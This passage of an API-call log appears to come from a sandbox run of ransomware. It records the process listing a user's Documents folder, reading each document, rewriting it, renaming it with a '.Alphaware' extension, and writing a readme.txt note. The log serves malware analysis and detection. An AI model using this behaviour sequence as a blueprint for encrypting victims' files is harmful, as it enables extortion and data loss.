lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x285f34c0, ftCreationTime.dwHighDateTime=0x1d96c28, ftLastAccessTime.dwLowDateTime=0xa7c6e9b0, ftLastAccessTime.dwHighDateTime=0x1d975e2, ftLastWriteTime.dwLowDateTime=0xa7c6e9b0, ftLastWriteTime.dwHighDateTime=0x1d975e2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="beaeacczBwDfQo39", cAlternateFileName="BEAEAC~1")) returned 1 [0084.159] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92220ea0, ftCreationTime.dwHighDateTime=0x1d973e9, ftLastAccessTime.dwLowDateTime=0x3304c590, ftLastAccessTime.dwHighDateTime=0x1d97504, ftLastWriteTime.dwLowDateTime=0x3304c590, ftLastWriteTime.dwHighDateTime=0x1d97504, nFileSizeHigh=0x0, nFileSizeLow=0xd000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Duc5tpM3PDmAXr1.ots", cAlternateFileName="DUC5TP~1.OTS")) returned 1 [0084.159] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc456c20, ftCreationTime.dwHighDateTime=0x1d971a5, ftLastAccessTime.dwLowDateTime=0xfe4cb7d0, ftLastAccessTime.dwHighDateTime=0x1d97667, ftLastWriteTime.dwLowDateTime=0xfe4cb7d0, ftLastWriteTime.dwHighDateTime=0x1d97667, nFileSizeHigh=0x0, nFileSizeLow=0x134ff, dwReserved0=0x0, dwReserved1=0x0, cFileName="jvxZB--pZ8D4tDAf.xls", cAlternateFileName="JVXZB-~1.XLS")) returned 1 [0084.159] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x154d8050, ftCreationTime.dwHighDateTime=0x1d97185, ftLastAccessTime.dwLowDateTime=0x16de1a40, ftLastAccessTime.dwHighDateTime=0x1d974d9, ftLastWriteTime.dwLowDateTime=0x16de1a40, ftLastWriteTime.dwHighDateTime=0x1d974d9, nFileSizeHigh=0x0, nFileSizeLow=0x8c4e, dwReserved0=0x0, dwReserved1=0x0, cFileName="miKlgwo4kuAJyz.xls", cAlternateFileName="MIKLGW~1.XLS")) returned 1 [0084.159] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe34fea0, ftCreationTime.dwHighDateTime=0x1d975fa, ftLastAccessTime.dwLowDateTime=0xcd9fc5a0, ftLastAccessTime.dwHighDateTime=0x1d97658, ftLastWriteTime.dwLowDateTime=0xcd9fc5a0, ftLastWriteTime.dwHighDateTime=0x1d97658, nFileSizeHigh=0x0, nFileSizeLow=0x4a9c, dwReserved0=0x0, dwReserved1=0x0, cFileName="xZfG0gp1VfGWa8doIagS.ots", cAlternateFileName="XZFG0G~1.OTS")) returned 1 [0084.159] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1de25ad0, ftCreationTime.dwHighDateTime=0x1d97264, ftLastAccessTime.dwLowDateTime=0xac3fb2b0, ftLastAccessTime.dwHighDateTime=0x1d97605, ftLastWriteTime.dwLowDateTime=0xac3fb2b0, ftLastWriteTime.dwHighDateTime=0x1d97605, nFileSizeHigh=0x0, nFileSizeLow=0x1209e, dwReserved0=0x0, dwReserved1=0x0, cFileName="z8zS.rtf", cAlternateFileName="")) returned 1 [0084.159] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0084.159] FindClose (in: hFindFile=0xd8a1f0 | out: hFindFile=0xd8a1f0) returned 1 [0084.159] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e898) returned 1 [0084.159] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23eab8) returned 1 [0084.159] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\584vk2Slwl33KAWC.docx", dwFileAttributes=0x80) returned 1 [0084.160] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e958) returned 1 [0084.160] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\584vk2Slwl33KAWC.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\y- 0\\584vk2slwl33kawc.docx"), fInfoLevelId=0x0, lpFileInformation=0x248f298 | out: lpFileInformation=0x248f298*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x39e81a30, ftCreationTime.dwHighDateTime=0x1d96666, ftLastAccessTime.dwLowDateTime=0x367e09f0, ftLastAccessTime.dwHighDateTime=0x1d97619, ftLastWriteTime.dwLowDateTime=0x367e09f0, ftLastWriteTime.dwHighDateTime=0x1d97619, nFileSizeHigh=0x0, nFileSizeLow=0x18ec9)) returned 1 [0084.160] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e908) returned 1 [0084.160] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9e8) returned 1 [0084.160] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\584vk2Slwl33KAWC.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\y- 0\\584vk2slwl33kawc.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0084.161] GetFileType (hFile=0x254) returned 0x1 [0084.161] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e958) returned 1 [0084.161] GetFileType (hFile=0x254) returned 0x1 [0084.161] GetFileSize (in: hFile=0x254, lpFileSizeHigh=0x23eb68 | out: lpFileSizeHigh=0x23eb68*=0x0) returned 0x18ec9 [0084.169] ReadFile (in: hFile=0x254, lpBuffer=0x12640ba8, nNumberOfBytesToRead=0x18ec9, lpNumberOfBytesRead=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x12640ba8*, lpNumberOfBytesRead=0x23ea98*=0x18ec9, lpOverlapped=0x0) returned 1 [0084.171] CloseHandle (hObject=0x254) returned 1 [0084.210] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e918) returned 1 [0084.210] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\584vk2Slwl33KAWC.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\y- 0\\584vk2slwl33kawc.docx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0084.213] GetFileType (hFile=0x254) returned 0x1 [0084.213] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e888) returned 1 [0084.213] GetFileType (hFile=0x254) returned 0x1 [0084.227] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e888) returned 1 [0084.227] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\584vk2Slwl33KAWC.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\y- 0\\584vk2slwl33kawc.docx"), fInfoLevelId=0x0, lpFileInformation=0x23ebb0 | out: lpFileInformation=0x23ebb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39e81a30, ftCreationTime.dwHighDateTime=0x1d96666, ftLastAccessTime.dwLowDateTime=0x367e09f0, ftLastAccessTime.dwHighDateTime=0x1d97619, ftLastWriteTime.dwLowDateTime=0x84657f80, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x21488)) returned 1 [0084.228] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e838) returned 1 [0084.228] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\584vk2Slwl33KAWC.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\y- 0\\584vk2slwl33kawc.docx"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\584vk2Slwl33KAWC.docx.Alphaware" (normalized: "c:\\users\\keecfmwgj\\documents\\y- 0\\584vk2slwl33kawc.docx.alphaware")) returned 1 [0084.229] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9a8) returned 1 [0084.229] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\readme.txt" (normalized: "c:\\users\\keecfmwgj\\documents\\y- 0\\readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0084.230] GetFileType (hFile=0x254) returned 0x1 [0084.230] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e918) returned 1 [0084.230] GetFileType (hFile=0x254) returned 0x1 [0084.232] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\9WZXgiA1p9.rtf", dwFileAttributes=0x80) returned 1 [0084.233] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e958) returned 1 [0084.233] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\9WZXgiA1p9.rtf" (normalized: "c:\\users\\keecfmwgj\\documents\\y- 0\\9wzxgia1p9.rtf"), fInfoLevelId=0x0, lpFileInformation=0x246b478 | out: lpFileInformation=0x246b478*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x6c0bf320, ftCreationTime.dwHighDateTime=0x1d96e03, ftLastAccessTime.dwLowDateTime=0x4dc1f4c0, ftLastAccessTime.dwHighDateTime=0x1d9738d, ftLastWriteTime.dwLowDateTime=0x4dc1f4c0, ftLastWriteTime.dwHighDateTime=0x1d9738d, nFileSizeHigh=0x0, nFileSizeLow=0x44a6)) returned 1 [0084.233] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e908) returned 1 [0084.233] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9e8) returned 1 [0084.233] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\9WZXgiA1p9.rtf" (normalized: "c:\\users\\keecfmwgj\\documents\\y- 0\\9wzxgia1p9.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0084.234] GetFileType (hFile=0x254) returned 0x1 [0084.234] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e958) returned 1 [0084.234] GetFileType (hFile=0x254) returned 0x1 [0084.234] GetFileSize (in: hFile=0x254, lpFileSizeHigh=0x23eb68 | out: lpFileSizeHigh=0x23eb68*=0x0) returned 0x44a6 [0084.234] ReadFile (in: hFile=0x254, lpBuffer=0x246b6d0, nNumberOfBytesToRead=0x44a6, lpNumberOfBytesRead=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x246b6d0*, lpNumberOfBytesRead=0x23ea98*=0x44a6, lpOverlapped=0x0) returned 1 [0084.236] CloseHandle (hObject=0x254) returned 1 [0084.289] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e918) returned 1 [0084.289] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\9WZXgiA1p9.rtf" (normalized: "c:\\users\\keecfmwgj\\documents\\y- 0\\9wzxgia1p9.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0084.292] GetFileType (hFile=0x254) returned 0x1 [0084.292] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e888) returned 1 [0084.292] GetFileType (hFile=0x254) returned 0x1 [0084.294] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e888) returned 1 [0084.294] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\9WZXgiA1p9.rtf" (normalized: "c:\\users\\keecfmwgj\\documents\\y- 0\\9wzxgia1p9.rtf"), fInfoLevelId=0x0, lpFileInformation=0x23ebb0 | out: lpFileInformation=0x23ebb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c0bf320, ftCreationTime.dwHighDateTime=0x1d96e03, ftLastAccessTime.dwLowDateTime=0x4dc1f4c0, ftLastAccessTime.dwHighDateTime=0x1d9738d, ftLastWriteTime.dwLowDateTime=0x84716660, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x5c60)) returned 1 [0084.295] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e838) returned 1 [0084.295] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\9WZXgiA1p9.rtf" (normalized: "c:\\users\\keecfmwgj\\documents\\y- 0\\9wzxgia1p9.rtf"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\9WZXgiA1p9.rtf.Alphaware" (normalized: "c:\\users\\keecfmwgj\\documents\\y- 0\\9wzxgia1p9.rtf.alphaware")) returned 1 [0084.296] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\jvxZB--pZ8D4tDAf.xls", dwFileAttributes=0x80) returned 1 [0084.296] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e958) returned 1 [0084.296] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\jvxZB--pZ8D4tDAf.xls" (normalized: "c:\\users\\keecfmwgj\\documents\\y- 0\\jvxzb--pz8d4tdaf.xls"), fInfoLevelId=0x0, lpFileInformation=0x251c410 | out: lpFileInformation=0x251c410*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xdc456c20, ftCreationTime.dwHighDateTime=0x1d971a5, ftLastAccessTime.dwLowDateTime=0xfe4cb7d0, ftLastAccessTime.dwHighDateTime=0x1d97667, ftLastWriteTime.dwLowDateTime=0xfe4cb7d0, ftLastWriteTime.dwHighDateTime=0x1d97667, nFileSizeHigh=0x0, nFileSizeLow=0x134ff)) returned 1 [0084.297] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e908) returned 1 [0084.297] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9e8) returned 1 [0084.297] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\jvxZB--pZ8D4tDAf.xls" (normalized: "c:\\users\\keecfmwgj\\documents\\y- 0\\jvxzb--pz8d4tdaf.xls"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0084.297] GetFileType (hFile=0x254) returned 0x1 [0084.297] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e958) returned 1 [0084.298] GetFileType (hFile=0x254) returned 0x1 [0084.298] GetFileSize (in: hFile=0x254, lpFileSizeHigh=0x23eb68 | out: lpFileSizeHigh=0x23eb68*=0x0) returned 0x134ff [0084.298] ReadFile (in: hFile=0x254, lpBuffer=0x251c698, nNumberOfBytesToRead=0x134ff, lpNumberOfBytesRead=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x251c698*, lpNumberOfBytesRead=0x23ea98*=0x134ff, lpOverlapped=0x0) returned 1 [0084.300] CloseHandle (hObject=0x254) returned 1 [0084.343] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e918) returned 1 [0084.344] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\jvxZB--pZ8D4tDAf.xls" (normalized: "c:\\users\\keecfmwgj\\documents\\y- 0\\jvxzb--pz8d4tdaf.xls"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0084.346] GetFileType (hFile=0x254) returned 0x1 [0084.346] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e888) returned 1 [0084.346] GetFileType (hFile=0x254) returned 0x1 [0084.350] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e888) returned 1 [0084.351] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\jvxZB--pZ8D4tDAf.xls" (normalized: "c:\\users\\keecfmwgj\\documents\\y- 0\\jvxzb--pz8d4tdaf.xls"), fInfoLevelId=0x0, lpFileInformation=0x23ebb0 | out: lpFileInformation=0x23ebb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc456c20, ftCreationTime.dwHighDateTime=0x1d971a5, ftLastAccessTime.dwLowDateTime=0xfe4cb7d0, ftLastAccessTime.dwHighDateTime=0x1d97667, ftLastWriteTime.dwLowDateTime=0x84788a80, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x19cc8)) returned 1 [0084.351] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e838) returned 1 [0084.351] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\jvxZB--pZ8D4tDAf.xls" (normalized: "c:\\users\\keecfmwgj\\documents\\y- 0\\jvxzb--pz8d4tdaf.xls"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\jvxZB--pZ8D4tDAf.xls.Alphaware" (normalized: "c:\\users\\keecfmwgj\\documents\\y- 0\\jvxzb--pz8d4tdaf.xls.alphaware")) returned 1 [0084.353] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\miKlgwo4kuAJyz.xls", dwFileAttributes=0x80) returned 1 [0084.358] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e958) returned 1 [0084.358] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\miKlgwo4kuAJyz.xls" (normalized: "c:\\users\\keecfmwgj\\documents\\y- 0\\miklgwo4kuajyz.xls"), fInfoLevelId=0x0, lpFileInformation=0x2466be0 | out: lpFileInformation=0x2466be0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x154d8050, ftCreationTime.dwHighDateTime=0x1d97185, ftLastAccessTime.dwLowDateTime=0x16de1a40, ftLastAccessTime.dwHighDateTime=0x1d974d9, ftLastWriteTime.dwLowDateTime=0x16de1a40, ftLastWriteTime.dwHighDateTime=0x1d974d9, nFileSizeHigh=0x0, nFileSizeLow=0x8c4e)) returned 1 [0084.358] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e908) returned 1 [0084.358] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9e8) returned 1 [0084.359] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\miKlgwo4kuAJyz.xls" (normalized: "c:\\users\\keecfmwgj\\documents\\y- 0\\miklgwo4kuajyz.xls"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0084.359] GetFileType (hFile=0x254) returned 0x1 [0084.359] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e958) returned 1 [0084.359] GetFileType (hFile=0x254) returned 0x1 [0084.359] GetFileSize (in: hFile=0x254, lpFileSizeHigh=0x23eb68 | out: lpFileSizeHigh=0x23eb68*=0x0) returned 0x8c4e [0084.360] ReadFile (in: hFile=0x254, lpBuffer=0x2466e70, nNumberOfBytesToRead=0x8c4e, lpNumberOfBytesRead=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x2466e70*, lpNumberOfBytesRead=0x23ea98*=0x8c4e, lpOverlapped=0x0) returned 1 [0084.361] CloseHandle (hObject=0x254) returned 1 [0084.397] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e918) returned 1 [0084.397] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\miKlgwo4kuAJyz.xls" (normalized: "c:\\users\\keecfmwgj\\documents\\y- 0\\miklgwo4kuajyz.xls"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0084.400] GetFileType (hFile=0x254) returned 0x1 [0084.400] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e888) returned 1 [0084.400] GetFileType (hFile=0x254) returned 0x1 [0084.404] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e888) returned 1 [0084.404] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\miKlgwo4kuAJyz.xls" (normalized: "c:\\users\\keecfmwgj\\documents\\y- 0\\miklgwo4kuajyz.xls"), fInfoLevelId=0x0, lpFileInformation=0x23ebb0 | out: lpFileInformation=0x23ebb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x154d8050, ftCreationTime.dwHighDateTime=0x1d97185, ftLastAccessTime.dwLowDateTime=0x16de1a40, ftLastAccessTime.dwHighDateTime=0x1d974d9, ftLastWriteTime.dwLowDateTime=0x84821000, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xbbe0)) returned 1 [0084.404] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e838) returned 1 [0084.404] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\miKlgwo4kuAJyz.xls" (normalized: "c:\\users\\keecfmwgj\\documents\\y- 0\\miklgwo4kuajyz.xls"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\miKlgwo4kuAJyz.xls.Alphaware" (normalized: "c:\\users\\keecfmwgj\\documents\\y- 0\\miklgwo4kuajyz.xls.alphaware")) returned 1 [0084.405] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\z8zS.rtf", dwFileAttributes=0x80) returned 1 [0084.406] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e958) returned 1 [0084.406] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\z8zS.rtf" (normalized: "c:\\users\\keecfmwgj\\documents\\y- 0\\z8zs.rtf"), fInfoLevelId=0x0, lpFileInformation=0x251bdb0 | out: lpFileInformation=0x251bdb0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x1de25ad0, ftCreationTime.dwHighDateTime=0x1d97264, ftLastAccessTime.dwLowDateTime=0xac3fb2b0, ftLastAccessTime.dwHighDateTime=0x1d97605, ftLastWriteTime.dwLowDateTime=0xac3fb2b0, ftLastWriteTime.dwHighDateTime=0x1d97605, nFileSizeHigh=0x0, nFileSizeLow=0x1209e)) returned 1 [0084.406] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e908) returned 1 [0084.406] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9e8) returned 1 [0084.407] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\z8zS.rtf" (normalized: "c:\\users\\keecfmwgj\\documents\\y- 0\\z8zs.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0084.407] GetFileType (hFile=0x254) returned 0x1 [0084.407] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e958) returned 1 [0084.407] GetFileType (hFile=0x254) returned 0x1 [0084.407] GetFileSize (in: hFile=0x254, lpFileSizeHigh=0x23eb68 | out: lpFileSizeHigh=0x23eb68*=0x0) returned 0x1209e [0084.407] ReadFile (in: hFile=0x254, lpBuffer=0x251bfd8, nNumberOfBytesToRead=0x1209e, lpNumberOfBytesRead=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x251bfd8*, lpNumberOfBytesRead=0x23ea98*=0x1209e, lpOverlapped=0x0) returned 1 [0084.413] CloseHandle (hObject=0x254) returned 1 [0084.476] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e918) returned 1 [0084.477] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\z8zS.rtf" (normalized: "c:\\users\\keecfmwgj\\documents\\y- 0\\z8zs.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0084.478] GetFileType (hFile=0x254) returned 0x1 [0084.478] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e888) returned 1 [0084.479] GetFileType (hFile=0x254) returned 0x1 [0084.482] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e888) returned 1 [0084.482] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\z8zS.rtf" (normalized: "c:\\users\\keecfmwgj\\documents\\y- 0\\z8zs.rtf"), fInfoLevelId=0x0, lpFileInformation=0x23ebb0 | out: lpFileInformation=0x23ebb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1de25ad0, ftCreationTime.dwHighDateTime=0x1d97264, ftLastAccessTime.dwLowDateTime=0xac3fb2b0, ftLastAccessTime.dwHighDateTime=0x1d97605, ftLastWriteTime.dwLowDateTime=0x848df6e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x181a0)) returned 1 [0084.482] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e838) returned 1 [0084.483] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\z8zS.rtf" (normalized: "c:\\users\\keecfmwgj\\documents\\y- 0\\z8zs.rtf"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\z8zS.rtf.Alphaware" (normalized: "c:\\users\\keecfmwgj\\documents\\y- 0\\z8zs.rtf.alphaware")) returned 1 [0084.483] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23eb98) returned 1 [0084.483] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x291b14e0, ftCreationTime.dwHighDateTime=0x1d975a3, ftLastAccessTime.dwLowDateTime=0x848df6e0, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x848df6e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0084.484] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39e81a30, ftCreationTime.dwHighDateTime=0x1d96666, ftLastAccessTime.dwLowDateTime=0x367e09f0, ftLastAccessTime.dwHighDateTime=0x1d97619, ftLastWriteTime.dwLowDateTime=0x84657f80, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x21488, dwReserved0=0x0, dwReserved1=0x0, cFileName="584vk2Slwl33KAWC.docx.Alphaware", cAlternateFileName="584VK2~1.ALP")) returned 1 [0084.484] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c0bf320, ftCreationTime.dwHighDateTime=0x1d96e03, ftLastAccessTime.dwLowDateTime=0x4dc1f4c0, ftLastAccessTime.dwHighDateTime=0x1d9738d, ftLastWriteTime.dwLowDateTime=0x84716660, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x5c60, dwReserved0=0x0, dwReserved1=0x0, cFileName="9WZXgiA1p9.rtf.Alphaware", cAlternateFileName="9WZXGI~1.ALP")) returned 1 [0084.484] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x285f34c0, ftCreationTime.dwHighDateTime=0x1d96c28, ftLastAccessTime.dwLowDateTime=0xa7c6e9b0, ftLastAccessTime.dwHighDateTime=0x1d975e2, ftLastWriteTime.dwLowDateTime=0xa7c6e9b0, ftLastWriteTime.dwHighDateTime=0x1d975e2, nFileSizeHigh=0x0, 